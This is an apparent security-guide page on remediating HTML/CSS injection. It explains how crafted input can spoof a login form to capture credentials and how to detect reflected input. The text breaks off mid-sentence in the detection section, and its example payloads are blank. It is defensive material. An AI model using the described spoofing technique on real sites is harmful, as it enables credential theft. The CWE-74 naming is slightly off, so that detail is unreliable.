1. Home
  2. Web App Vulnerabilities
  3. How to remediate – HTML/CSS Injection
Searching...

How to remediate – HTML/CSS Injection

Contents

1. Introduction

HTML/CSS Injection is an attack where malicious code is inserted into a web page, altering its content. This can be used to steal user credentials through fake login forms or redirect users to harmful websites. It primarily affects web applications that do not properly handle user-supplied data. A successful attack could compromise the confidentiality of user information and disrupt service availability.

2. Technical Explanation

HTML/CSS Injection occurs when an application reflects unfiltered user input directly into its HTML output. An attacker provides crafted input containing malicious HTML or CSS code, which is then rendered by the victim’s browser. This requires the application to trust and display data without proper sanitization. The Common Weakness Enumeration (CWE) identifier for this vulnerability is CWE-74: Improper Sanitization of Data Forming a Client Web Page Response. An example exploit involves submitting a URL with malicious CSS that hides a legitimate login form and displays a fake one, capturing user credentials.

  • Root cause: Lack of proper input validation and output encoding when handling user-supplied data in HTML pages.
  • Exploit mechanism: An attacker crafts a URL containing malicious HTML/CSS code that is then reflected back to the user’s browser, leading to content spoofing or potential Cross-Site Scripting (XSS). For example, submitting `` as part of a parameter.
  • Scope: Web applications using any server-side language (e.g., PHP, Python, Java) and frameworks that do not implement robust input sanitization are vulnerable.

3. Detection and Assessment

To confirm vulnerability, first check if user-supplied data is reflected in the HTML source code without encoding. A thorough assessment involves attempting to inject malicious HTML/CSS tags and observing their effect on the rendered page.

  • Quick checks: Inspect the HTML source code of pages where user input is displayed for unencoded characters like `<`, `>`, `&`, `’` and `/`.
  • Scanning: Burp Suite or OWASP ZAP can be used with active scanning rules to identify potential injection points. These are examples only, manual verification is required.
  • Logs and evidence: Examine web server logs for requests containing HTML/CSS tags in URL parameters. Look for patterns like `